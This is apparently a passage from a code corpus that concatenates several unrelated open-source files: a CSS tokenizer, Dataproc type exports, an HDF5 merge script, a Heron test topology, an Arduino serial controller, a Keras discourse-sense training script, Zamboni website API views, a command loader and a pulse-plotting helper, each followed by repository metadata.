commentmatcher = [x[1] for x in tokenmatches if x[0] == 'COMMENT'][0]
urimatcher = [x[1] for x in tokenmatches if x[0] == 'URI'][0]
_TOKENIZER_CACHE[hash_key] = (tokenmatches, commentmatcher, urimatcher)
self.tokenmatches = tokenmatches
self.commentmatcher = commentmatcher
self.urimatcher = urimatcher
self._doComments = doComments
self._pushed = []
def _expand_macros(self, macros, productions):
"""returns macro expanded productions, order of productions is kept"""
def macro_value(m):
return '(?:%s)' % macros[m.groupdict()['macro']]
expanded = []
for key, value in productions:
while re.search(r'{[a-zA-Z][a-zA-Z0-9-]*}', value):
value = re.sub(r'{(?P<macro>[a-zA-Z][a-zA-Z0-9-]*)}',
macro_value, value)
expanded.append((key, value))
return expanded
def _compile_productions(self, expanded_productions):
"""compile productions into callable match objects, order is kept"""
compiled = []
for key, value in expanded_productions:
compiled.append((key, re.compile('^(?:%s)' % value, re.U).match))
return compiled
def push(self, *tokens):
"""Push back tokens which have been pulled but not processed."""
self._pushed = itertools.chain(tokens, self._pushed)
def clear(self):
self._pushed = []
def tokenize(self, text, fullsheet=False):
"""Generator: Tokenize text and yield tokens, each token is a tuple
of::
(name, value, line, col)
The token value will contain a normal string, meaning CSS unicode
escapes have been resolved to normal characters. The serializer
escapes needed characters back to unicode escapes depending on
the stylesheet target encoding.
text
to be tokenized
fullsheet
if ``True`` appends EOF token as last one and completes incomplete
COMMENT or INVALID (to STRING) tokens
"""
def _repl(m):
"used by unicodesub"
num = int(m.group(0)[1:], 16)
if num < 0x10000:
return unichr(num)
else:
return m.group(0)
def _normalize(value):
"normalize and do unicodesub"
return normalize(self.unicodesub(_repl, value))
line = col = 1
# check for BOM first as it should only be max one at the start
(BOM, matcher), productions = self.tokenmatches[0], self.tokenmatches[1:]
match = matcher(text)
if match:
found = match.group(0)
yield (BOM, found, line, col)
text = text[len(found):]
# check for @charset which is valid only at start of CSS
if text.startswith('@charset '):
found = '@charset ' # production has trailing S!
yield (CSSProductions.CHARSET_SYM, found, line, col)
text = text[len(found):]
col += len(found)
while text:
# do pushed tokens before new ones
for pushed in self._pushed:
yield pushed
# speed test for most used CHARs, sadly . not possible :(
c = text[0]
if c in u',:;{}>+[]':
yield ('CHAR', c, line, col)
col += 1
text = text[1:]
else:
# check all other productions, at least CHAR must match
for name, matcher in productions:
# TODO: USE bad comment?
if fullsheet and name == 'CHAR' and text.startswith(u'/*'):
# before CHAR production test for incomplete comment
possiblecomment = u'%s*/' % text
match = self.commentmatcher(possiblecomment)
if match and self._doComments:
yield ('COMMENT', possiblecomment, line, col)
text = None # ate all remaining text
break
match = matcher(text) # if no match try next production
if match:
found = match.group(0) # needed later for line/col
if fullsheet:
# check if found may be completed into a full token
if 'INVALID' == name and text == found:
# complete INVALID to STRING with start char " or '
name, found = 'STRING', '%s%s' % (found, found[0])
elif 'FUNCTION' == name and\
u'url(' == _normalize(found):
# url( is a FUNCTION if incomplete sheet
# FUNCTION production MUST BE after URI production
for end in (u"')", u'")', u')'):
possibleuri = '%s%s' % (text, end)
match = self.urimatcher(possibleuri)
if match:
name, found = 'URI', match.group(0)
break
if name in ('DIMENSION', 'IDENT', 'STRING', 'URI',
'HASH', 'COMMENT', 'FUNCTION', 'INVALID',
'UNICODE-RANGE'):
# may contain unicode escape, replace with normal
# char but do not _normalize (?)
value = self.unicodesub(_repl, found)
if name in ('STRING', 'INVALID'): #'URI'?
# remove \ followed by nl (so escaped) from string
value = self.cleanstring('', found)
else:
if 'ATKEYWORD' == name:
try:
# get actual ATKEYWORD SYM
name = self._atkeywords[_normalize(found)]
except KeyError, e:
# might also be misplace @charset...
if '@charset' == found and u' ' == text[len(found):len(found)+1]:
# @charset needs tailing S!
name = CSSProductions.CHARSET_SYM
found += u' '
else:
name = 'ATKEYWORD'
value = found # should not contain unicode escape (?)
if self._doComments or (not self._doComments and
name != 'COMMENT'):
yield (name, value, line, col)
text = text[len(found):]
nls = found.count(self._linesep)
line += nls
if nls:
col = len(found[found.rfind(self._linesep):])
else:
col += len(found)
break
if fullsheet:
yield ('EOF', u'', line, col)
| gpl-3.0 | -3,785,011,545,157,365,000 | 41.851351 | 101 | 0.451567 | false |
googleapis/python-dataproc | google/cloud/dataproc_v1/types/__init__.py | 1 | 5250 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .autoscaling_policies import (
AutoscalingPolicy,
BasicAutoscalingAlgorithm,
BasicYarnAutoscalingConfig,
CreateAutoscalingPolicyRequest,
DeleteAutoscalingPolicyRequest,
GetAutoscalingPolicyRequest,
InstanceGroupAutoscalingPolicyConfig,
ListAutoscalingPoliciesRequest,
ListAutoscalingPoliciesResponse,
UpdateAutoscalingPolicyRequest,
)
from .clusters import (
AcceleratorConfig,
AutoscalingConfig,
Cluster,
ClusterConfig,
ClusterMetrics,
ClusterStatus,
CreateClusterRequest,
DeleteClusterRequest,
DiagnoseClusterRequest,
DiagnoseClusterResults,
DiskConfig,
EncryptionConfig,
EndpointConfig,
GceClusterConfig,
GetClusterRequest,
GkeClusterConfig,
IdentityConfig,
InstanceGroupConfig,
KerberosConfig,
LifecycleConfig,
ListClustersRequest,
ListClustersResponse,
ManagedGroupConfig,
MetastoreConfig,
NodeGroupAffinity,
NodeInitializationAction,
ReservationAffinity,
SecurityConfig,
ShieldedInstanceConfig,
SoftwareConfig,
StartClusterRequest,
StopClusterRequest,
UpdateClusterRequest,
)
from .jobs import (
CancelJobRequest,
DeleteJobRequest,
GetJobRequest,
HadoopJob,
HiveJob,
Job,
JobMetadata,
JobPlacement,
JobReference,
JobScheduling,
JobStatus,
ListJobsRequest,
ListJobsResponse,
LoggingConfig,
PigJob,
PrestoJob,
PySparkJob,
QueryList,
SparkJob,
SparkRJob,
SparkSqlJob,
SubmitJobRequest,
UpdateJobRequest,
YarnApplication,
)
from .operations import (
ClusterOperationMetadata,
ClusterOperationStatus,
)
from .workflow_templates import (
ClusterOperation,
ClusterSelector,
CreateWorkflowTemplateRequest,
DeleteWorkflowTemplateRequest,
GetWorkflowTemplateRequest,
InstantiateInlineWorkflowTemplateRequest,
InstantiateWorkflowTemplateRequest,
ListWorkflowTemplatesRequest,
ListWorkflowTemplatesResponse,
ManagedCluster,
OrderedJob,
ParameterValidation,
RegexValidation,
TemplateParameter,
UpdateWorkflowTemplateRequest,
ValueValidation,
WorkflowGraph,
WorkflowMetadata,
WorkflowNode,
WorkflowTemplate,
WorkflowTemplatePlacement,
)
__all__ = (
"AutoscalingPolicy",
"BasicAutoscalingAlgorithm",
"BasicYarnAutoscalingConfig",
"CreateAutoscalingPolicyRequest",
"DeleteAutoscalingPolicyRequest",
"GetAutoscalingPolicyRequest",
"InstanceGroupAutoscalingPolicyConfig",
"ListAutoscalingPoliciesRequest",
"ListAutoscalingPoliciesResponse",
"UpdateAutoscalingPolicyRequest",
"AcceleratorConfig",
"AutoscalingConfig",
"Cluster",
"ClusterConfig",
"ClusterMetrics",
"ClusterStatus",
"CreateClusterRequest",
"DeleteClusterRequest",
"DiagnoseClusterRequest",
"DiagnoseClusterResults",
"DiskConfig",
"EncryptionConfig",
"EndpointConfig",
"GceClusterConfig",
"GetClusterRequest",
"GkeClusterConfig",
"IdentityConfig",
"InstanceGroupConfig",
"KerberosConfig",
"LifecycleConfig",
"ListClustersRequest",
"ListClustersResponse",
"ManagedGroupConfig",
"MetastoreConfig",
"NodeGroupAffinity",
"NodeInitializationAction",
"ReservationAffinity",
"SecurityConfig",
"ShieldedInstanceConfig",
"SoftwareConfig",
"StartClusterRequest",
"StopClusterRequest",
"UpdateClusterRequest",
"CancelJobRequest",
"DeleteJobRequest",
"GetJobRequest",
"HadoopJob",
"HiveJob",
"Job",
"JobMetadata",
"JobPlacement",
"JobReference",
"JobScheduling",
"JobStatus",
"ListJobsRequest",
"ListJobsResponse",
"LoggingConfig",
"PigJob",
"PrestoJob",
"PySparkJob",
"QueryList",
"SparkJob",
"SparkRJob",
"SparkSqlJob",
"SubmitJobRequest",
"UpdateJobRequest",
"YarnApplication",
"ClusterOperationMetadata",
"ClusterOperationStatus",
"Component",
"ClusterOperation",
"ClusterSelector",
"CreateWorkflowTemplateRequest",
"DeleteWorkflowTemplateRequest",
"GetWorkflowTemplateRequest",
"InstantiateInlineWorkflowTemplateRequest",
"InstantiateWorkflowTemplateRequest",
"ListWorkflowTemplatesRequest",
"ListWorkflowTemplatesResponse",
"ManagedCluster",
"OrderedJob",
"ParameterValidation",
"RegexValidation",
"TemplateParameter",
"UpdateWorkflowTemplateRequest",
"ValueValidation",
"WorkflowGraph",
"WorkflowMetadata",
"WorkflowNode",
"WorkflowTemplate",
"WorkflowTemplatePlacement",
)
| apache-2.0 | 7,266,723,360,725,168,000 | 24.119617 | 74 | 0.719238 | false |
startcode/apollo | modules/tools/prediction/mlp_train/merge_h5.py | 1 | 2643 | #!/usr/bin/env python
###############################################################################
# Copyright 2018 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import os
import glob
import argparse
import datetime
import numpy as np
import h5py
def load_hdf5(filename):
"""
load training samples from *.hdf5 file
"""
if not(os.path.exists(filename)):
print "file:", filename, "does not exist"
os._exit(1)
if os.path.splitext(filename)[1] != '.h5':
print "file:", filename, "is not an hdf5 file"
os._exit(1)
h5_file = h5py.File(filename, 'r')
values = h5_file.values()[0]
print "load data size:", values.shape[0]
return values
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'generate training samples\
from a specified directory')
parser.add_argument('directory', type=str,
help='directory contains feature files in .h5')
args = parser.parse_args()
path = args.directory
print "load h5 from directory:", format(path)
if os.path.isdir(path):
features = None
labels = None
h5_files = glob.glob(path + '/*.h5')
print "Length of files:", len(h5_files)
for i, h5_file in enumerate(h5_files):
print "Process File", i, ":", h5_file
feature = load_hdf5(h5_file)
if np.any(np.isinf(feature)):
print "inf data found"
features = np.concatenate((features, feature), axis=0) if features is not None \
else feature
else:
print "Fail to find", path
os._exit(-1)
date = datetime.datetime.now().strftime('%Y-%m-%d')
sample_dir = path + '/mlp_merge'
if not os.path.exists(sample_dir):
os.makedirs(sample_dir)
sample_file = sample_dir + '/mlp_' + date + '.h5'
print "Save samples file to:", sample_file
h5_file = h5py.File(sample_file, 'w')
h5_file.create_dataset('data', data=features)
h5_file.close()
| apache-2.0 | -8,108,443,370,418,419,000 | 32.455696 | 92 | 0.595157 | false |
twitter/heron | integration_test/src/python/integration_test/topology/one_spout_multi_tasks/one_spout_multi_tasks.py | 2 | 1572 | #!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=missing-docstring
from heronpy.api.stream import Grouping
from integration_test.src.python.integration_test.core import TestTopologyBuilder
from integration_test.src.python.integration_test.common.bolt import IdentityBolt
from integration_test.src.python.integration_test.common.spout import ABSpout
def one_spout_multi_tasks_builder(topology_name, http_server_url):
builder = TestTopologyBuilder(topology_name, http_server_url)
ab_spout = builder.add_spout("ab-spout", ABSpout, 3)
builder.add_bolt("identity-bolt", IdentityBolt,
inputs={ab_spout: Grouping.SHUFFLE},
par=1,
optional_outputs=['word'])
return builder.create_topology()
| apache-2.0 | 4,743,227,587,584,489,000 | 40.368421 | 81 | 0.741094 | false |
webbhorn/Arduino-Switch-Controller | arduino/arduino.py | 1 | 2214 | #!/usr/bin/env python
import serial, time
class Arduino(object):
__OUTPUT_PINS = -1
def __init__(self, port, baudrate=9600):
self.serial = serial.Serial(port, baudrate)
def __str__(self):
return "Arduino is on port %s at %d baudrate" %(self.serial.port, self.serial.baudrate)
def output(self, pinArray):
self.__sendData(len(pinArray))
if(isinstance(pinArray, list) or isinstance(pinArray, tuple)):
self.__OUTPUT_PINS = pinArray
for each_pin in pinArray:
self.__sendPin(each_pin)
return True
def setLow(self, pin):
self.__sendData('0')
self.__sendPin(pin)
return True
def setHigh(self, pin):
self.__sendData('1')
self.__sendPin(pin)
return True
def getState(self, pin):
self.__sendData('2')
self.__sendPin(pin)
return self.__formatPinState(self.__getData())
def analogWrite(self, pin, value):
self.__sendData('3')
hex_value = hex(value)[2:]
if(len(hex_value)==1):
self.__sendData('0')
else:
self.__sendData(hex_value[0])
self.__sendData(hex_value[1])
return True
def analogRead(self, pin):
self.__sendData('4')
self.__sendPin(pin)
return self.__getData()
def turnOff(self):
for each_pin in self.__OUTPUT_PINS:
self.setLow(each_pin)
return True
def __sendPin(self, pin):
pin_in_char = chr(pin+48)
self.__sendData(pin_in_char)
def __sendData(self, serial_data):
while(self.__getData()!="what"):
pass
self.serial.write(str(serial_data))
def __getData(self):
return self.serial.readline().replace("\r\n","")
def __formatPinState(self, pinValue):
if pinValue=='1':
return True
else:
return False
def close(self):
self.serial.close()
return True
"""
def __del__(self):
#close serial connection once program ends
#this fixes the problem of port getting locked or unrecoverable in some linux systems
self.serial.close()
"""
| mit | 4,657,381,806,307,410,000 | 24.744186 | 95 | 0.555104 | false |
jimmycallin/master-thesis | architectures/conll16st-v34-focused-rnns/v34/train.py | 1 | 11478 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable=C0103,W0621
"""
Train the discourse relation sense classifier (CoNLL16st).
"""
__author__ = "GW [http://gw.tnode.com/] <[email protected]>"
__license__ = "GPLv3+"
import argparse
import codecs
import json
import logging
import os
import sys
from keras.models import Model
from keras.callbacks import ModelCheckpoint, EarlyStopping
from keras.layers import Input, Embedding, TimeDistributed, Dense, merge, GRU, Dropout, Activation, Lambda, K
from keras.layers.advanced_activations import SReLU
from conll16st_data.load import Conll16stDataset
from generic_utils import Tee, debugger, load_from_pkl, save_to_pkl
from data_utils import build_index, batch_generator, load_word2vec
# logging
sys.excepthook = debugger # attach debugger
sys.stdout = Tee([sys.stdout])
sys.stderr = Tee([sys.stderr])
logging.basicConfig(format="[%(asctime)s] %(message)s", datefmt="%Y-%m-%d %H:%M", level=logging.DEBUG)
log = logging.getLogger(__name__)
# parse arguments
argp = argparse.ArgumentParser(description=__doc__.strip().split("\n", 1)[0])
argp.add_argument('experiment_dir',
help="directory for storing trained model and other resources")
argp.add_argument('train_dir',
help="CoNLL16st dataset directory for training")
argp.add_argument('valid_dir',
help="CoNLL16st dataset directory for validation")
argp.add_argument('--clean', action='store_true',
help="clean previous experiment")
argp.add_argument('--config', type=json.loads,
help="override default experiment configuration (dict as string)")
argp.add_argument('--static_input_embedding', action='store_true')
args = argp.parse_args()
# experiment files
console_log = "{}/console.log".format(args.experiment_dir)
indexes_pkl = "{}/indexes.pkl".format(args.experiment_dir)
indexes_size_pkl = "{}/indexes_size.pkl".format(args.experiment_dir)
train_snapshot_dir = "{}/train_snapshot".format(args.experiment_dir)
valid_snapshot_dir = "{}/valid_snapshot".format(args.experiment_dir)
model_yaml = "{}/model.yaml".format(args.experiment_dir)
model_png = "{}/model.png".format(args.experiment_dir)
metrics_csv = "{}/metrics.csv".format(args.experiment_dir)
metrics_png = "{}/metrics.png".format(args.experiment_dir)
weights_hdf5 = "{}/weights.hdf5".format(args.experiment_dir)
weights_val_hdf5 = "{}/weights_val.hdf5".format(args.experiment_dir)
static_input_embedding = args.static_input_embedding
# experiment initialization
if args.clean and os.path.isdir(args.experiment_dir):
import shutil
shutil.rmtree(args.experiment_dir)
if not os.path.isdir(args.experiment_dir):
os.makedirs(args.experiment_dir)
f_log = codecs.open(console_log, mode='a', encoding='utf8')
try:
sys.stdout.files.append(f_log)
sys.stderr.files.append(f_log)
except AttributeError:
f_log.close()
# experiment configuration
log.info("configuration ({})".format(args.experiment_dir))
if args.config:
config = args.config
else:
config = {}
def c(k, d):
log.debug(" config '{}': {} ({})".format(k, config.get(k, ""), d))
return config.get(k, d)
epochs = int(c('epochs', 1000)) #= 200 (for real epochs)
epochs_len = int(c('epochs_len', -1)) #= -1 (for real epochs)
epochs_patience = int(c('epochs_patience', 20)) #=10 (for real epochs)
batch_size = int(c('batch_size', 64)) #= 16
snapshot_size = int(c('snapshot_size', 2048))
random_per_sample = int(c('random_per_sample', 32))
words_dim = int(c('words_dim', 20))
focus_dim = int(c('focus_dim', 4)) #3-6?
rnn_dim = int(c('rnn_dim', 20)) #10-20?
final_dim = int(c('final_dim', 100))
arg1_len = int(c('arg1_len', 100)) #= 100 (en), 500 (zh)
arg2_len = int(c('arg2_len', 100)) #= 100 (en), 500 (zh)
conn_len = int(c('conn_len', 10)) #= 10 (en, zh)
punc_len = int(c('punc_len', 2)) #=0 (en, but error), 2 (zh)
words_dropout = c('words_dropout', 0.1) #0-0.2?
focus_dropout_W = c('focus_dropout_W', 0.33) #0?, >0.5?
focus_dropout_U = c('focus_dropout_U', 0.66) #0?, irrelevant?
rnn_dropout_W = c('rnn_dropout_W', 0.33) #0.6-0.8?, irrelevant?
rnn_dropout_U = c('rnn_dropout_U', 0.33) #0-0.5?
final_dropout = c('final_dropout', 0.5) #0.4-0.9?, <0.5?
filter_types = None
#filter_types = ["Explicit"]
#filter_types = ["Implicit", "EntRel", "AltLex"]
filter_senses = None
#filter_senses = ["Contingency.Condition"]
filter_fn_name = c('filter_fn_name', "conn_eq_0")
if filter_fn_name == "conn_eq_0": # connective length not equals 0
filter_fn = lambda r: len(r['Connective']['TokenList']) == 0
elif filter_fn_name == "conn_gt_0": # connective length not greater than 0
filter_fn = lambda r: len(r['Connective']['TokenList']) > 0
else: # no filter
filter_fn = None
# initialize weights with pre-trained word2vec embeddings
words2vec_bin = c('words2vec_bin', None) # en="./data/word2vec-en/GoogleNews-vectors-negative300.bin.gz"
words2vec_txt = c('words2vec_txt', None) # zh="./data/word2vec-zh/zh-Gigaword-300.txt"
for var in ['args.experiment_dir', 'args.train_dir', 'args.valid_dir', 'K._config', 'os.getenv("THEANO_FLAGS")', 'filter_types', 'filter_senses', 'filter_fn_name', 'config']:
log.info(" {}: {}".format(var, eval(var)))
# load datasets
log.info("load dataset for training ({})".format(args.train_dir))
train = Conll16stDataset(args.train_dir, filter_types=filter_types, filter_senses=filter_senses, filter_fn=filter_fn)
log.info(train.summary())
if epochs_len < 0:
epochs_len = len(train['rel_ids'])
log.info("load dataset for validation ({})".format(args.valid_dir))
valid = Conll16stDataset(args.valid_dir, filter_types=filter_types, filter_senses=filter_senses, filter_fn=filter_fn)
log.info(valid.summary())
# build indexes
if not os.path.isfile(indexes_pkl) or not os.path.isfile(indexes_size_pkl):
log.info("build indexes")
indexes = {}
indexes_size = {}
else:
log.info("previous indexes ({})".format(indexes_pkl))
indexes = load_from_pkl(indexes_pkl)
indexes_size = load_from_pkl(indexes_size_pkl)
indexes['words2id'], indexes_size['words2id'] = build_index(train['words'])
indexes['rel_senses2id'], indexes_size['rel_senses2id'] = build_index(train['rel_senses'])
log.info(" " + ", ".join([ "{}: {}".format(k, v) for k, v in indexes_size.items() ]))
save_to_pkl(indexes_pkl, indexes)
save_to_pkl(indexes_size_pkl, indexes_size)
init_weights = load_word2vec(indexes['words2id'], indexes_size['words2id'], words_dim, words2vec_bin, words2vec_txt)
# build model
log.info("build model")
words2id_size = indexes_size['words2id']
rel_senses2id_size = indexes_size['rel_senses2id']
shared_emb = Embedding(input_dim=words2id_size, output_dim=words_dim, weights=init_weights, dropout=words_dropout, mask_zero=True, name="shared_emb", trainable=not static_input_embedding)
# input: arg1 word/token ids
arg1_ids = Input(shape=(arg1_len,), dtype='int32', name="arg1_ids")
# shape: (sample, arg1_len) of words2id_size
# input: arg2 word/token ids
arg2_ids = Input(shape=(arg2_len,), dtype='int32', name="arg2_ids")
# shape: (sample, arg2_len) of words2id_size
# input: connective word/token ids
conn_ids = Input(shape=(conn_len,), dtype='int32', name="conn_ids")
# shape: (sample, conn_len) of words2id_size
# input: punctuation word/token ids
punc_ids = Input(shape=(punc_len,), dtype='int32', name="punc_ids")
# shape: (sample, punc_len) of words2id_size
def focused_rnns(arg1_ids):
"""One RNN decides focus weights for other RNNs."""
# embed arg1 input sequence
arg1_emb = shared_emb(arg1_ids)
# shape: (sample, arg1_len, words_dim)
# focus weights for all RNNs
focus_weights = GRU(focus_dim, return_sequences=True, dropout_U=focus_dropout_U, dropout_W=focus_dropout_W)(arg1_emb)
# shape: (sample, arg1_len, focus_dim)
# individual RNNs with focus
rnns = []
for i in range(focus_dim):
# focus weights for current RNN
select_repeat = Lambda(lambda x: K.repeat_elements(x[:, i], words_dim, axis=-1), output_shape=lambda s: s[:1] + (words_dim,))
rnn_focus = TimeDistributed(select_repeat)(focus_weights)
# shape: (samples, arg1_len, words_dim)
# weighted input sequence
rnn_in = merge([arg1_emb, rnn_focus], mode='mul')
# shape: (samples, arg1_len, words_dim)
# individual RNN
rnn = GRU(rnn_dim, return_sequences=False, dropout_U=rnn_dropout_U, dropout_W=rnn_dropout_W)(rnn_in)
rnns.append(rnn)
# shape: (samples, rnn_dim)
return rnns
# merge focused RNNs
arg1_rnns = focused_rnns(arg1_ids)
arg2_rnns = focused_rnns(arg2_ids)
conn_rnns = focused_rnns(conn_ids)
punc_rnns = focused_rnns(punc_ids)
# dense layer with logistic regression on top
x = merge(arg1_rnns + arg2_rnns + conn_rnns + punc_rnns, mode='concat')
x = Dense(final_dim)(x)
x = SReLU()(x)
x = Dropout(final_dropout)(x)
# shape: (samples, 2*hidden_dim)
x = Dense(rel_senses2id_size)(x)
x = Activation('softmax', name='rsenses')(x)
# shape: (samples, rel_senses2id_size)
inputs = [arg1_ids, arg2_ids, conn_ids, punc_ids]
outputs = [x]
losses = {
'rsenses': c('rsenses_loss', 'categorical_crossentropy'),
}
metrics = {
'rsenses': ['accuracy', 'loss'],
}
model = Model(input=inputs, output=outputs)
with open(model_yaml, 'w') as f:
model.to_yaml(stream=f)
model.summary()
model.compile(optimizer=c('optimizer', "adam"), loss=losses, metrics=metrics)
# initialize weights
if not os.path.isfile(weights_hdf5):
log.info("initialize weights")
else:
log.info("previous weights ({})".format(args.experiment_dir))
model.load_weights(weights_hdf5)
# prepare for training
log.info("prepare snapshots")
#if not os.path.isdir(train_snapshot_dir):
#train_snapshot = next(batch_generator(train, indexes, indexes_size, arg1_len, arg2_len, conn_len, punc_len, min(len(train['rel_ids']), snapshot_size), random_per_sample=0))
# save_dict_of_np(train_snapshot_dir, train_snapshot)
#train_snapshot = load_dict_of_np(train_snapshot_dir)
#if not os.path.isdir(valid_snapshot_dir):
valid_snapshot = next(batch_generator(valid, indexes, indexes_size, arg1_len, arg2_len, conn_len, punc_len, min(len(valid['rel_ids']), snapshot_size), random_per_sample=0))
# save_dict_of_np(valid_snapshot_dir, valid_snapshot)
#valid_snapshot = load_dict_of_np(valid_snapshot_dir)
train_iter = batch_generator(train, indexes, indexes_size, arg1_len, arg2_len, conn_len, punc_len, batch_size, random_per_sample=random_per_sample)
# train model
log.info("train model")
callbacks = [
ModelCheckpoint(monitor='loss', mode='min', filepath=weights_hdf5, save_best_only=True),
ModelCheckpoint(monitor='val_loss', mode='min', filepath=weights_val_hdf5, save_best_only=True),
EarlyStopping(monitor='val_loss', mode='min', patience=epochs_patience),
]
history = model.fit_generator(train_iter, nb_epoch=epochs, samples_per_epoch=epochs_len, validation_data=valid_snapshot, callbacks=callbacks, verbose=2)
log.info("training finished")
# return best result for hyperopt
results = {}
for k in history.history:
results[k] = history.history[k][-1] # copy others
results['loss_min'] = min(history.history['loss'])
results['acc_max'] = max(history.history['acc'])
results['val_loss_min'] = min(history.history['val_loss'])
results['val_acc_max'] = max(history.history['val_acc'])
results['epochs_len'] = len(history.history['loss'])
results['loss_'] = results['loss']
results['loss'] = -results['val_acc_max'] # objective for minimization
results['status'] = 'ok'
print("\n\n{}".format(json.dumps(results)))
| mit | 9,170,306,203,527,456,000 | 39.702128 | 187 | 0.694372 | false |
clouserw/zamboni | mkt/websites/views.py | 1 | 1959 | from django.db.transaction import non_atomic_requests
from rest_framework.generics import ListAPIView
from rest_framework.permissions import AllowAny
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.api.paginator import ESPaginator
from mkt.search.filters import (PublicSearchFormFilter, RegionFilter,
SearchQueryFilter)
from mkt.search.forms import SimpleSearchForm
from mkt.websites.indexers import WebsiteIndexer
from mkt.websites.models import Website
from mkt.websites.serializers import ESWebsiteSerializer, WebsiteSerializer
class WebsiteView(CORSMixin, MarketplaceView, ListAPIView):
cors_allowed_methods = ['get']
authentication_classes = [RestSharedSecretAuthentication,
RestOAuthAuthentication]
permission_classes = [AllowAny]
serializer_class = WebsiteSerializer
model = Website
class WebsiteSearchView(CORSMixin, MarketplaceView, ListAPIView):
"""
Base website search view based on a single-string query.
"""
cors_allowed_methods = ['get']
authentication_classes = [RestSharedSecretAuthentication,
RestOAuthAuthentication]
permission_classes = [AllowAny]
filter_backends = [PublicSearchFormFilter, RegionFilter, SearchQueryFilter]
serializer_class = ESWebsiteSerializer
paginator_class = ESPaginator
form_class = SimpleSearchForm
def get_queryset(self):
return WebsiteIndexer.search()
@classmethod
def as_view(cls, **kwargs):
# Make all search views non_atomic: they should not need the db, or
# at least they should not need to make db writes, so they don't need
# to be wrapped in transactions.
view = super(WebsiteSearchView, cls).as_view(**kwargs)
return non_atomic_requests(view)
| bsd-3-clause | -3,533,117,552,146,456,000 | 38.979592 | 79 | 0.720265 | false |
rizumu/bootmachine | bootmachine/management/__init__.py | 1 | 3322 | # (c) 2008-2011 James Tauber and contributors; written for Pinax (http://pinaxproject.com)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
import os
import sys
import bootmachine
BOOTMACHINE_COMMAND_DIR = os.path.join(
os.path.dirname(bootmachine.__file__), "management", "commands"
)
class CommandNotFound(Exception):
pass
class CommandLoader(object):
def __init__(self):
self.command_dir = BOOTMACHINE_COMMAND_DIR
self.commands = {}
self._load_commands()
def _load_commands(self):
for f in os.listdir(self.command_dir):
if not f.startswith("_") and f.endswith(".py"):
name = f[:-3]
mod = "bootmachine.management.commands.%s" % name
try:
__import__(mod)
except:
self.commands[name] = sys.exc_info()
else:
mod = sys.modules[mod]
self.commands[name] = mod.Command()
def load(self, name):
try:
command = self.commands[name]
except KeyError:
raise CommandNotFound("Unable to find command '%s'" % name)
else:
if isinstance(command, tuple):
# an exception occurred when importing the command so let's
# re-raise it here
raise(command[0], command[1], command[2])
return command
class CommandRunner(object):
usage = "bootmachine-admin command [options] [args]"
def __init__(self, argv=None):
self.argv = argv or sys.argv[:]
self.loader = CommandLoader()
self.loader.commands["help"] = self.help()
def help(self):
loader, usage = self.loader, self.usage
# use BaseCommand for --version
from bootmachine.management.base import BaseCommand
class HelpCommand(BaseCommand):
def handle(self, *args, **options):
print("Usage: {}\n".format(usage))
print("Options:"
" --version show program's version number and exit\n"
" -h, --help show this help message and exit\n"
"Available commands:\n")
for command in loader.commands.keys():
print(" {}".format(command))
return HelpCommand()
def execute(self):
argv = self.argv[:]
try:
command = self.argv[1]
except IndexError:
# display help if no arguments were given.
command = "help"
argv.extend(["help"])
# special cases for bootmachine-admin itself
if command in ["-h", "--help"]:
argv.pop()
command = "help"
argv.extend(["help"])
if command == "--version":
argv.pop()
command = "help"
argv.extend(["help", "--version"])
# load command and run it!
try:
self.loader.load(command).run_from_argv(argv)
except CommandNotFound as e:
sys.stderr.write("{}\n".format(e.args[0]))
sys.exit(1)
def execute_from_command_line():
"""
A simple method that runs a ManagementUtility.
"""
runner = CommandRunner()
runner.execute()
| mit | -1,116,202,746,595,356,300 | 30.339623 | 90 | 0.54124 | false |
DiCarloLab-Delft/PycQED_py3 | pycqed/utilities/pulse_scheme.py | 1 | 5469 | import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches
def new_pulse_fig(figsize):
'''
Open a new figure and configure it to plot pulse schemes.
'''
fig, ax = plt.subplots(1, 1, figsize=figsize, frameon=False)
ax.axis('off')
fig.subplots_adjust(bottom=0, top=1, left=0, right=1)
ax.axhline(0, color='0.75')
return fig, ax
def new_pulse_subplot(fig, *args, **kwargs):
'''
Add a new subplot configured for plotting pulse schemes to a figure.
All *args and **kwargs are passed to fig.add_subplot.
'''
ax = fig.add_subplot(*args, **kwargs)
ax.axis('off')
fig.subplots_adjust(bottom=0, top=1, left=0, right=1)
ax.axhline(0, color='0.75')
return ax
def mwPulse(ax, pos, y_offs=0, width=1.5, amp=1, label=None, phase=0, labelHeight=1.3,
color='C0', modulation='normal', **plot_kws):
'''
Draw a microwave pulse: Gaussian envelope with modulation.
'''
x = np.linspace(pos, pos + width, 100)
envPos = amp * np.exp(-(x - (pos + width / 2))**2 / (width / 4)**2)
